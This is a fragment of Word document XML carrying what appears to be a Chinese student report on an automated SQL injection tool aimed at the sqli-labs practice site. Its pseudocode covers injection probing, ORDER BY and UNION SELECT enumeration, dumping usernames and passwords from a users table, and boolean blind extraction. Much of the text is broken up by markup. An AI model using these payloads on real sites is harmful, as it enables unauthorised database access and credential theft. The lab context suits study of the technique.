          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>://xxx/Less-1/,po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fldChar w:fldCharType="end"/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方式提交的数据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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AED450" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C5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/>
          <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>操作结果：返回post请求的响应内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F13D2E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68E0F6E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2F2B4F2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414746B" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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2.本程序包含四个模块：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC2F1C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）主程序模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C349D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）报错注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F5C84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）盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A11249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）POST注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB54B5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C17E899" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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伪码算法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4324ED" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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proofErr w:type="spellStart"/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Sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EC6EF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1,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content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6768DB08" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="240" w:hangingChars="100" w:hanging="2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this_time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ime.strf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%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:%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:%S',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ime.local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ime.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)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA7A6D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>3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[' +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his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]' + content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B82CE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2A010A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1ABDC5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send_request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2930D13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res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.urlop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50D816F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result  ← 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s.rea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).decode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF684C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84FDDB1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AF8B99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can_inject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12F5FF4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test_list  ←  ['%27', '%27%29', '%22', '%22%29']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024FEE1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for item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then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D95E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     target_url1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str(item) + '%20and%201 ← 1%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1CF64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       target_url2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str(item) + '%20and%201=2%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042091C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       result1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target_url1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7084670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        result2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target_url2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2271C0E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     soup1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1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01012DE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        fonts1  ←  soup1.find_all('font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254B2A00" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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content1  ←  str(fonts1[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F96FA1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    soup2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2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6E065E7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       fonts2  ←  soup2.find_all('font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05633D0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3.       content2  ←  str(fonts2[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B27D1FC" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="1200" w:hangingChars="500" w:hanging="120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4.       if content1.find('Login'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!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 -1 and content2 is None or content2.strip() = '' then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF981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   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Use ' + item + ' -&gt; Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586AD1F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6.           True, item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1505FD9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7.        else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DE9CA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   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Use ' + item + ' -&gt; Not Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742C130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   target_url3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:-1] + '-1' + '%20%20or%201=1%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E39A8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   target_url4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:-1] + '-1' + '%20%20or%201=2%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAC584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1.    result3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target_url3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC2915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2.    result4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target_url4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E039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3.    soup3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3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37EC2A4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4.    fonts3  ←  soup3.find_all('font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1F5DC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5.    content3  ←  str(fonts3[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E8A8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6.    soup4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4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65F4CC5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7.    fonts4  ←  soup4.find_all('font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4FC5A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8.    content4  ←  str(fonts4[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5F4DCC" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="960" w:hangingChars="400" w:hanging="96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9.    if content3.find('You'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!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 -1 and content4 is None or content4.strip() = '' then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69385DC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0.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Integer Type -&gt; Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32719C5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1.       True, 'integer'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B88812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2.    else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECFF8E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33.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Integer Type -&gt; Not Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8BBAAA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A84C6F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2D1452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15699B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test_order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y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, symbol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12541CA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flag  ←  0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDC39B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100):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9DFAE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Order By Test -&gt; ' +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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAFC50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       if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ymbol !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teger':then</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B25F469" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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symbol + '%20order%20by%20' +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        +  '--+'   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1E1E5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            result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207E99F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         soup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33E47E1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           fonts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oup.find_al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font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC5A2B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           content  ←  str(fonts[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF9A4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        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tent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Login') = -1 then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CE42D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       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Order By Test Success -&gt; order by ' +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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE678D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               flag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</w:p>
    <w:p w14:paraId="0AB7727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4.                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAEA08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5.        else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5850894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%20order%20by%20' +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24AFFBE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           result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0E60B2B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           soup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2EB463A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           fonts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oup.find_al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font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5960DE3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0.            content  ←  str(fonts[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7439627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1.            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tent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Login') == -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5883F09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2.        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Order By Test Success -&gt; order by ' +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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B2681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3.                flag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</w:p>
    <w:p w14:paraId="4F50F96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4.                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707CA83A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94EA1A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89D0CD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C02675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prefix_url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2343B9F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splits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=')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7842238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s.remove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splits[-1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C58DF7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prefix_url  ←  ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188266C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for item in splits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAE764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prefix_url += str(item)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FC574A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3AD6F0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F891B69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9ED6A0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test_union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lect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, symbol, flag):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7408808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prefix_url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0538996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ymbol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%') != -1 then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6762121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4.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0' + symbol + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385D822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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7657050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-1' + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0368EF3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flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAD7BE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     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= flag - 1 then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79780B5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%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D58C7B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        else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F2F56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,'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BE1BB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    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1838CE2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       result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564AB11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       soup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0A78F12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       fonts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oup.find_al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font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC71D1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6.        content  ←  str(fonts[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB495C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       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flag):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E2247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           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tent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 != -1 then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459DE62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   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tent.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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55929EC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   end      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E174B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1.    except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084723B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2.    print(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C32D75D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57CCC20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FAFAA1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11CEC4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exec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unction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symbol, flag, index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, function):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA0406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prefix_url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77D43BA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ymbol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%') != -1 then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2401A6B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0' + symbol + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E65E96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    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B94C8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-1' + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA6F3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    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flag):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1448D74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     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 index then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4977EA9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function + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1870030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lif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 = flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C31827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%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3266849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        else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F976A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,'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4926A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   result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635BB90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   soup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50D6AAA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   fonts  ←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oup.find_al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font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565D590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7.    content  ←  str(fonts[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562C45C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   return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tent.split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0])[1].split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[1])[0]  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7D583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2ADA13A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2A0EFBEC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1BE35C03" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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atabas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, symbol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D994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test_url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symbol + 'hacking___'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FF4AB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result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27E1E7E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sult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MySQL') !=-1 then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208992A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   'MySQL'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CD054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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C50A6D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    'Cannot get database'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1CB64E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18ABD61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290136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C45E04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database_int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6FB955D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test_url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:-1] + '-1' + '%20or%201=2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341FCBD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result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42DCA95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sult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MySQL') != -1 then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2659301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    'MySQL'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4696D91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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241429E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    'Cannot get DBMS'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498E3EE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86CE6D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4E0CDF4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F49C92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s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symbol, flag, index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3CB7C4C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prefix_url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7103C7D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ymbol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%') != -1 then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3915CDD5" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="1200" w:hangingChars="500" w:hanging="120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0' + symbol + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148638A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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C39059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-1' + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329822E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flag) do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118103C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 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 index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7A40F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' + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761BC1A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lif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 =flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E1607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bookmarkStart w:id="6" w:name="OLE_LINK1"/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</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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 + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F6B0F" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:leftChars="228" w:left="719" w:hangingChars="100" w:hanging="2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%20from%20information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chema.tables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%20where%20table_schema=database()%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FAFB8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      else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548F9AF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,'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2439EA47" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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nd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD5DC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result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3362F5F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soup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7683667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fonts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oup.find_al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font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FFAE1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8.content ← str(fonts[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C76D2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9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tent.split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0])[1].split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[1])[0] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3F44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BAED940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DD15275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254FCB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symbol, flag, index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016ECFE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prefix_url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132A438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ymbol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%') != -1 then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576C985C" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="1200" w:hangingChars="500" w:hanging="120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0' + symbol + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1DE75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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2241A62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-1' + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9068E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flag) do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E15695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, flag) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16771F6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           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 index then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FB679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   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' + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C1CAC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lif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 = flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728DBDC3" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="1440" w:hangingChars="600" w:hanging="14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   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str(i) + '%20from%20information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chema.columns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%20where%20' \                                    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\'users\'%20and%20table_schema=database()%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B5D0E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3.            else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541B4F6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   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str(i) + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C32D4A" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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nd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AD532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result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2C5C3F9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soup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6A00225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fonts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oup.find_al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font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2232ADC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9. content ← str(fonts[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D40EE3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tent.split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0])[1].split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[1])[0]  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFFFF7D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DF91EC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91E6CE5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F44544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ata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symbol, flag, index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4B62CFE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prefix_url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28CEF17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if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ymbol.fi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%') !=-1 then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26132C1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0' + symbol + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488E51F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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EBE0C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efix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'=-1' + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721BF16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flag) do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35093A4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flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0DE72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 index then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3669747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test_url +=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id,0x3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,username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,0x3a,password)' + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A60D5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lif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 = flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B869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%20from%20users%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71475EF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3.else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1228B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,'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B063A0" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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nd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEAA99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17. result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777A10F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soup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result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20E9327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fonts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oup.find_al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font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D41C03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0. content ← str(fonts[2].text)    21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tent.split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temp_list[0])[1].split(temp_list[1])[0].split(',') </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E77042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6E6F24E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4EA85A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41575E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6585DBB" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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o_sql_inject_un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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1710A7B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Welcome to SQL Injection Tool')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FF476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Check for SQL Injection.........')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006373D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ult, symbol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an_injec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0260D4B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not result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then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CCDB0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Targe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does not exist SQL Injection -&gt; Exit')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FC6BE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lse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C3A5C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if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ymbol.find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%') != -1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then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABB939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Test Order By And Union Select........')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591AE37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lif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symbol = 'integer':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77947E7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Test Integer........')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C4138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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2D6DA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Cannot use keyword Union........')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D5143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flag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st_order_by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417616D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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A57162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index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st_union_selec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, flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FA1DD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excep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ypeErro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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5810C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8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Cannot use keyword Union........')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C899C2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9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database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databas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463884F8" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="1440" w:hangingChars="600" w:hanging="14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0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version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xec_funct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symbol, flag, index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'version()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0152013A" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="1440" w:hangingChars="600" w:hanging="14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his_databas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xec_funct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symbol, flag, index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'database()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4205CD7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Success -&gt; ' +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base.stri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) + ' ' +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version.stri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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A7F4F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Database -&gt; ' +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his_database.stri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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6DAFE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tables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table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symbol, flag, index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4400FFD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Tables -&gt; ' +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s.stri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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756492C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Default Use Table users......')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E60DAA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columns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column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symbol, flag, index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54B10F3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8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Columns -&gt; ' +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umns.stri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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A15C9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9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Try to get Data........\n\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7469DBC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0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data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data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symbol, flag, index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mp_li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1C205F3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>3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temp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umns.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,')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F1B49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%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AA0F7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for meta in data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do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E20702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temp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meta.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:')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7B178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%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164278F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6.        end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F26D321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F7E4C1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B39E38D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6DB5FD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8F920E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o_sql_injection_special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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3870680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.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?')[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B52D4A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ool_based_inject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43B46F1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C16CB8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18BC64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A42548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o_time_based_injection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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB29F5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time_based_injection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689842B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__name__ = '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3445675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less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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65993E4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while less &lt;= 16:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F812C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\r\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nScannin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Less-' + str(less) + '\r\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F5FB7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if less &lt;= 10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BDF362" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720" w:hangingChars="300" w:hanging="72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o_sql_inject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http://sqli-labs.com/Less-' + str(less) + '/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ex.php?i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1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562EAB93" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720" w:hangingChars="300" w:hanging="72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judge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o_sql_injection_specia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http://sqli-labs.com/Less-' + str(less) + '/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ex.php?i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1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5779105A" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="48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if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judge !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 "Success"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then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do_time_based_injection('http://sqli-labs.com/Less-1/index.php?id=1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A75206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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A68720B" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="48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o_injection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o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http://sqli-labs.com/Less-' + str(less) + '/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ex.ph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73EC086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10B53A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A94E76F" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>bool_based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D7F8F3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log(content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A762B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this_time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ime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trf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'%H:%H:%S'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ime.local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ime.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)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D83DA6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[' +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his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]' + content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665F8BC5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A81EE49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59F720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1.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dbs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30E6A58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normalContextLen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"?id=1").text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B67FE5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url += "?id=1' and "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F95E79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>4.dbs ← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E343D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"&gt;Scanning databases with Bool......")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAF0FE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140):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10013D7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        for j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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9F314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            id ← "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(select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chema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" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68325C17" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="1680" w:hangingChars="700" w:hanging="168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"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chema.schemata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limit 0,1),{0},1)={1}--+".format(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, ascii(j))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F03BC6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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5F209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           r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4572402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         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ormalContext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=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.tex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4B142FB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   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j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60789DD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s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,')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4BE05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FEAACB9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8F0E862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D0FD3C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s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333BC9B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normalContextLen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"?id=1").text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B63E3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url += "?id=1' and "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457D511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tbs ← ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739CD76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"&gt;Scanning tables...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FFF0B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100):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC2912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        for j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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36470B2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            id ← "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(select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" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E84121D" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="1200" w:hangingChars="500" w:hanging="120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  "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chema.tables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 '{2}'" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB7C3CC" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="1200" w:hangingChars="500" w:hanging="120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  " limit 0,1),{0},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)=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{1}--+".format(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, ascii(j)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23DF13B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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4005476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           r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2591ED8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         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ormalContext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=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.tex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6A53029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                tbs += j</w:t>
      </w:r>
    </w:p>
